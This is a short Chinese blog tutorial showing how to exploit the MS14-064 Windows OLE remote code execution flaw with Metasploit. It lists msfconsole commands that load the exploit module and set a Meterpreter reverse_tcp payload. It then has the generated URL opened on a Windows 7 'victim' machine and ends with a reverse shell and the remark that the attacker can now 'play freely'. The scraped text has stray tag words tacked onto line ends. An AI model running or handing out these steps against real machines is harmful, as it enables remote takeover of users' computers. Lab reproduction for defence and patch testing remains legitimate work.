Microsoft Windows OLE远程代码执行漏洞,OLE(对象连接与嵌入)是一种容许应用程序共享数据和功能的技术,shell
远程攻击者利用此漏洞经过构造的网站执行任意代码,影响Win95+IE3 – Win10+IE11全版本...windows
metasploit里已经加入了此漏洞的利用模块 :exploit/windows/browser/ms14_064_ole_code_executiontcp
执行命令:测试
msfconsole //启动MSF网站
search ms14 //搜索关键字spa
use exploit/windows/browser/ms14_064_ole_code_execution // 加载漏洞利用模块code
set payload windows/meterpreter/reverse_tcp //设置反弹链接shell对象
如图:blog
须要注意的是箭头标记的属性默认为false 须要设置为true ,由于msf中自带的漏洞利用exp调用的是 powershell,it
因此msf(Metasploit Framework)中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell,
因此咱们这里测试受害的机器为windows7 32位.
按照图中各个属性配置好后 执行exploit便可
获得一个URL地址,复制到受害者机器(win7)测试
当用户点击容许了后
能够看见这边反弹了一个shell,接下里咱们就能够随便玩了,
测试成功,结束。